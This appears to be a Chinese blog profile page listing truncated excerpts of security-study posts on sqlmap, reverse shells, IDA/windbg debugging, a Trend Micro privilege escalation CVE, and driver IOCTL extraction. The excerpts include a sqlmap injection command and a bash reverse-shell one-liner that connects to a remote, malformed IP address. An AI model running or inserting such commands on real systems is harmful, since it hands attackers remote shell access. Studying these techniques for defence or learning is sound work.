發簡信
IP屬地:江蘇
-
博客遷移說明
開始一段新的旅程,博客遷移至Island's Blog歡迎大家訪問我的新博客,另外新博客里也做了評論系統,歡迎交流。簡書上將不再繼續更新 簡書確...
-
sqlmap學習查詢數據庫:python sqlmap.py -u "http://local.premeate.songboy.net/home/index....
-
sqlmap中文教程
http://note.youdao.com/noteshare?id=e55b73edde02c1057fe54f0cb0585070
-
web認證
關于我正在做的路由器的web認證方式是這樣的: 客戶端首先向服務器發送一條不帶認證的get。 服務器返回 Authorization Requi...
-
反彈shell
Reverse Shell bash反彈服務端: bash -c 'sh -i &>/dev/tcp/210.28.30.887/53 0>&1...
-
動靜結合調試——IDA地址與windbg地址對應
這是一個比較簡單的問題,但是思想走了一點彎路,覺得有必要記錄一下.首先需要厘清幾個概念: 文件偏移地址(File Offset) 裝載地址 (I...
-
趨勢科技緩沖區溢出權限逃逸漏洞
CVE-2018-6232這個漏洞允許本地攻擊者通過有漏洞的趨勢科技軟件提權。為了利用該漏洞,攻擊者首先得做到能在目標系統上執行低權限代碼。這個...
-
Some教訓值得回味
我始終相信,所有這些兜兜轉轉循環往復的事,在多年后都終有意義 計劃->執行->反饋 閉環對于任務第一反應首先不應該是立刻上手,計劃是很重要的一步...
-
提取驅動IOCTL code的實現
本文禁止轉載經過多日探索,暫時找到了兩種比較可靠的提取驅動IOCTL code的途徑,以下對具體執行過程進行簡介,并針對優缺點進行分析: IDA...